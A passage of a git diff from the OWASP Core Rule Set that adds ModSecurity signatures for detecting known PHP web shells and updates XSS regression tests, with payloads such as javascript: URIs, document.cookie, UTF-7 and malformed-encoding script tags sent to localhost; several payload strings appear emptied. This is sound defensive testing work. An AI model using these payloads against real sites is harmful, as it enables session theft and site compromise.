tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# PuNkHoLic shell web shell +# Various versions has this text written little differently so we need to do +# t:removeWhitespace and t:lowercase. +SecRule RESPONSE_BODY "@contains <title>punkholicshell" \ + "id:955300,\ + phase:4,\ + block,\ + capture,\ + t:none,t:removeWhitespace,t:lowercase,\ + msg:'PuNkHoLic shell web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# azrail web shell +SecRule RESPONSE_BODY "@rx ^\n \n azrail [0-9.]+ by C-W-M" \ + "id:955310,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + msg:'azrail web shell',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/122/17/650',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# SmEvK_PaThAn Shell web shell +SecRule RESPONSE_BODY "@rx >SmEvK_PaThAn Shell v[0-9]+ coded by \n.*? ~ Shell I\n\n" - output: - log_contains: id "941170" + - stage: + input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: '/' + data: "payload=javascript:/*-->" + output: + log_contains: id "941170" + - test_title: 941170-3 + desc: 'Test first backslash match (javascript:(?:[\s\S]+[=\x5c\(\[\.<]) with: javascript: \\\\t (extra backslashes to work around rule transformations)' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/?var=javascript:%20%5C%5C%5C%5Ct' + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + output: + log_contains: id "941170" + - test_title: 941170-4 + desc: 'Test second backslash match (javascript:(?:...|\x5c[ux]\d)) with: javascript:\\\\u0020 (extra backslashes to work around rule transformations)' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/?var=javascript:%5C%5C%5C%5Cu0020' + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + output: + log_contains: id "941170" + - test_title: 941170-5 + desc: "Status Page Test - data: , as GET variable" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/?test=%20data%3A%20%2C%20%3Cx%3E' + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + output: + log_contains: id "941170" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml index d6dd71ab05..7d8531cb83 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml @@ -1,58 +1,119 @@ --- - meta: - author: "zmallen" - enabled: true - name: "941180.yaml" - description: "Tests to trigger, or not trigger 941180" - tests: - - - test_title: 941180-1 - desc: Node-validator blacklist keywords, ARGS - stages: - - - stage: +meta: + author: "zmallen" + enabled: true + name: "941180.yaml" + description: "Tests to trigger, or not trigger 941180" +tests: + - test_title: 941180-1 + desc: Node-validator deny list keywords, ARGS + stages: + - stage: input: dest_addr: 127.0.0.1 - method: GET + method: POST port: 80 uri: '/foo' headers: - User-Agent: ModSecurity CRS 3 Tests + User-Agent: "OWASP CRS test agent" Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: '941180-1=window.location' output: log_contains: id "941180" - - - test_title: 941180-2 - desc: Node-validator blacklist keywords, ARGS_NAMES - stages: - - - stage: + - test_title: 941180-2 + desc: Node-validator deny list keywords, ARGS_NAMES + stages: + - stage: input: dest_addr: 127.0.0.1 - method: GET + method: POST port: 80 uri: '/bar' headers: - User-Agent: ModSecurity CRS 3 Tests + User-Agent: "OWASP CRS test agent" Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: 'document.cookie=941180-2' output: log_contains: id "941180" - - - test_title: 941180-3 - desc: Node-validator blacklist keywords, ARGS_NAMES - stages: - - - stage: + - test_title: 941180-3 + desc: Node-validator deny list keywords, ARGS_NAMES + stages: + - stage: input: dest_addr: 127.0.0.1 method: GET port: 80 uri: '/baz' headers: - User-Agent: ModSecurity CRS 3 Tests + User-Agent: "OWASP CRS test agent" Host: localhost Cookie: 'window.location=941180-3' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + log_contains: id "941180" + - test_title: 941180-4 + desc: Negative test for Node-validator deny list keyword -->, present in stricter sibling 941181, ARGS + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: '/foo' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941180-4=-->' + output: + no_log_contains: id "941180" + - test_title: 941180-5 + desc: "XSS with embedded shell execution attempt (batch script)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=\"-->'-->`-->" + version: HTTP/1.0 output: log_contains: id "941180" + - test_title: 941180-6 + desc: "Node-validator deny list keywords, ARGS, issue #2512" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: '/bar' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'arg=...(document.domain)...' + output: + log_contains: id "941180" + - test_title: 941180-7 + desc: "We should not trigger on REQUEST_FILENAME without special characters" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/javascript-manual/document.cookie' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + no_log_contains: id "941180" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml new file mode 100644 index 0000000000..aefed2faa0 --- /dev/null +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml @@ -0,0 +1,71 @@ +--- +meta: + author: "Paul Beckett" + enabled: true + name: "941181.yaml" + description: "Tests to trigger, or not trigger 941180" +tests: + - test_title: 941181-1 + desc: Node-validator deny list keywords, ARGS + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: '/foo' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941181-1=-->' + output: + log_contains: id "941181" + - test_title: 941181-2 + desc: Node-validator deny list keywords, ARGS + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: '/foo' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941181-1=--%3E' + output: + log_contains: id "941181" + - test_title: 941181-3 + desc: Node-validator deny list keywords, ARGS_NAMES + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: '/bar' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '-->=941181-3' + output: + log_contains: id "941181" + - test_title: 941181-4 + desc: Node-validator deny list keywords, ARGS_NAMES + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/baz' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: '-->=941181-4' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + log_contains: id "941181" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml index ffe9e90e57..6d17e269c5 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml @@ -1,58 +1,87 @@ --- - meta: - author: "csanders-git" - enabled: true - name: "941190.yaml" - description: "Tests to trigger, or not trigger 941190" - tests: - - - test_title: 941190-1 - desc: Node-validator blacklist keywords, ARGS - stages: - - - stage: +meta: + author: "csanders-git" + enabled: true + name: "941190.yaml" + description: "Tests to trigger, or not trigger 941190" +tests: + - test_title: 941190-1 + desc: Node-validator deny list keywords, ARGS + stages: + - stage: input: dest_addr: 127.0.0.1 method: GET port: 80 uri: '/foo' headers: - User-Agent: ModSecurity CRS 3 Tests + User-Agent: "OWASP CRS test agent" Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "941190-1=" output: log_contains: id "941190" - - - test_title: 941190-2 - desc: Node-validator blacklist keywords, ARGS_NAMES - stages: - - - stage: + - test_title: 941190-2 + desc: Node-validator deny list keywords, ARGS_NAMES + stages: + - stage: input: dest_addr: 127.0.0.1 method: GET port: 80 uri: '/bar' headers: - User-Agent: ModSecurity CRS 3 Tests + User-Agent: "OWASP CRS test agent" Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "x=" output: log_contains: id "941190" - - - test_title: 941190-3 - desc: Node-validator blacklist keywords, COOKIES_NAMES - stages: - - - stage: + - test_title: 941190-3 + desc: Node-validator deny list keywords, COOKIES_NAMES + stages: + - stage: input: dest_addr: 127.0.0.1 method: GET port: 80 uri: '/baz' headers: - User-Agent: ModSecurity CRS 3 Tests + User-Agent: "OWASP CRS test agent" Host: localhost Cookie: '' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + log_contains: id "941190" + - test_title: 941190-4 + desc: Test first replaced backslash match (\x5c) + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: 'My-Cookie=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941230" - - - test_title: 941230-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "941230" + - test_title: 941230-2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "payload=" - version: HTTP/1.0 - output: - log_contains: id "941230" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "payload=" + version: HTTP/1.0 + output: + log_contains: id "941230" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml index 9fa5b886a5..7cda4273d9 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml @@ -1,23 +1,39 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 941240.yaml - tests: - - - test_title: 941240-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 941240.yaml +tests: + - test_title: 941240-1 desc: "IE XSS Filters" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?var=%3c%3fimport%20implementation%20%3d" - version: HTTP/1.0 - output: - log_contains: id "941240" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=%3c%3fimport%20implementation%20%3d" + version: HTTP/1.0 + output: + log_contains: id "941240" + - test_title: 941240-2 + desc: "Status Page Test - IE XSS Filter " - version: HTTP/1.0 - output: - log_contains: id "941250" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "payload=" + version: HTTP/1.0 + output: + log_contains: id "941250" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml index 1ded21752e..176a4f18fd 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml @@ -1,39 +1,39 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 941260.yaml - tests: - - - test_title: 941260-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 941260.yaml +tests: + - test_title: 941260-1 desc: "IE XSS Filters" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941260" - - - test_title: 941260-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "941260" + - test_title: 941260-2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "payload= +ADw-script+AD4-alert(1)+ADw-/script+AD4-" - version: HTTP/1.0 - output: - log_contains: id "941260" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "payload= +ADw-script+AD4-alert(1)+ADw-/script+AD4-" + version: HTTP/1.0 + output: + log_contains: id "941260" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml index 144af883f8..abb31377cc 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml @@ -1,40 +1,40 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 941270.yaml - tests: - - - test_title: 941270-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 941270.yaml +tests: + - test_title: 941270-1 desc: "IE XSS Filters" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?var=%3clink%20%2f%20asdf%20href%20%20%2f%3d%20" - version: HTTP/1.0 - output: - log_contains: id "941270" - - - test_title: 941270-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=%3clink%20%2f%20asdf%20href%20%20%2f%3d%20" + version: HTTP/1.0 + output: + log_contains: id "941270" + - test_title: 941270-2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - version: HTTP/1.0 - data: 'payload=' - output: - log_contains: id "941270" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + version: HTTP/1.0 + data: 'payload=' + output: + log_contains: id "941270" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml index ef70421455..c591cfe647 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml @@ -1,44 +1,43 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 941280.yaml - tests: - - - test_title: 941280-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 941280.yaml +tests: + - test_title: 941280-1 desc: "IE XSS Filters" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?var=%3cBASE%20dsfds%20HREF%20%2f%20%3d" - version: HTTP/1.0 - output: - log_contains: id "941280" - - - test_title: 941280-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=%3cBASE%20dsfds%20HREF%20%2f%20%3d" + version: HTTP/1.0 + output: + log_contains: id "941280" + - test_title: 941280-2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Length: 113 - User-Agent: ModSecurity CRS 3 Tests - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/" - version: HTTP/1.0 - data: 'payload=xssxss&var=whatever" - version: HTTP/1.0 - output: - log_contains: id "941290" - - - test_title: 941290-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=&var=whatever" + version: HTTP/1.0 + output: + log_contains: id "941290" + - test_title: 941290-2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "payload=" - version: HTTP/1.0 - output: - log_contains: id "941290" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "payload=" + version: HTTP/1.0 + output: + log_contains: id "941290" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml index b67b452750..53a827d4e0 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml @@ -1,40 +1,40 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 941300.yaml - tests: - - - test_title: 941300-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 941300.yaml +tests: + - test_title: 941300-1 desc: "IE XSS Filters" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?%3cOBJECT%20data%20%3d=sdffdsa" - version: HTTP/1.0 - output: - log_contains: id "941300" - - - test_title: 941300-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?%3cOBJECT%20data%20%3d=sdffdsa" + version: HTTP/1.0 + output: + log_contains: id "941300" + - test_title: 941300-2 desc: "IE XSS Filters" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - version: HTTP/1.0 - data: "payload=" - output: - log_contains: id "941300" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + version: HTTP/1.0 + data: "payload=" + output: + log_contains: id "941300" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml index c1cb35185b..a033b90be7 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml @@ -1,75 +1,215 @@ --- - meta: - author: Christian S.J. Peron, Federico G. Schwindt - description: US-ASCII Malformed Encoding XSS Filter - enabled: true - name: 941310.yaml - tests: - - - test_title: 941310-1 +meta: + author: Christian S.J. Peron, Federico G. Schwindt + description: US-ASCII Malformed Encoding XSS Filter + enabled: true + name: 941310.yaml +tests: + - test_title: 941310-1 desc: Positive test using single byte stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-type: us-ascii - method: POST - port: 80 - uri: / - data: var=\xbcscript\xbealert(\xa2XSS\xa2)\xbc/script\xbe - output: - log_contains: id "941310" - - - test_title: 941310-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + data: var=\xbcscript\xbealert(\xa2XSS\xa2)\xbc/script\xbe + output: + log_contains: id "941310" + - test_title: 941310-2 desc: Positive test using utf-8 stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-type: us-ascii - method: POST - port: 80 - uri: / - data: var=\xc2\xbcscript\xc2\xbealert(\xc2\xa2XSS\xc2\xa2)\xc2\xbc/script\xc2\xbe - output: - log_contains: id "941310" - - - test_title: 941310-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + data: var=\xc2\xbcscript\xc2\xbealert(\xc2\xa2XSS\xc2\xa2)\xc2\xbc/script\xc2\xbe + output: + log_contains: id "941310" + - test_title: 941310-3 + desc: Positive test using alternate utf-8 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0\xbe + output: + log_contains: id "941310" + - test_title: 941310-4 + desc: Real world false positive for old rule with Russian utf-8 characters + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнопрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + output: + no_log_contains: id "941310" + - test_title: 941310-5 + desc: Real world false positive for old rule with German utf-8 characters + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + # Reported in https://github.com/coreruleset/coreruleset/issues/1645 as "de_matten & sitzbez\xc3\xbcge > fu\xc3\x9fmatten_mt" + data: var=de_matten & sitzbez\xc3\x83\xc2\xbcge > fu\xc3\x83\xc2\x9fmatten_mt + output: + no_log_contains: id "941310" + - test_title: 941310-6 desc: Negative test for opening tag stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-type: us-ascii - method: POST - port: 80 - uri: / - data: var=\xbc\xbc - output: - no_log_contains: id "941310" - - - test_title: 941310-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + data: var=\xbc\xbc + output: + no_log_contains: id "941310" + - test_title: 941310-7 desc: Negative test for closing tag stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-type: us-ascii - method: POST - port: 80 - uri: / - data: var=\xbe\xbe - output: - no_log_contains: id "941310" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + data: var=\xbe\xbe + output: + no_log_contains: id "941310" + - test_title: 941310-8 + desc: Negative for missing end tag, opening tag + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0 + output: + no_log_contains: id "941310" + - test_title: 941310-9 + desc: Negative for missing end tag, closing tag + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0/script\xd0\xbe + output: + no_log_contains: id "941310" + - test_title: 941310-10 + desc: Negative using real world Russian example in utf-8 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: / + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as 